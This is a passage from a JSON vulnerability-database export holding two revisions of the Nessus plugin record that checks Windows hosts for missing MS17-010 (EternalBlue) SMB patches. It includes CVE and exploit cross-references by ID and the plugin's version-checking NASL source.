"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:37:55", "history": [], "viewCount": 2977, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-08-19T12:37:55", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-08-19T12:37:55", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-08-19T12:37:55", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "c3cfbf804787e9c7754f38fc5f836f24", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T03:05:04", "history": [], "viewCount": 2977, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T03:05:04", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-06T03:05:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", 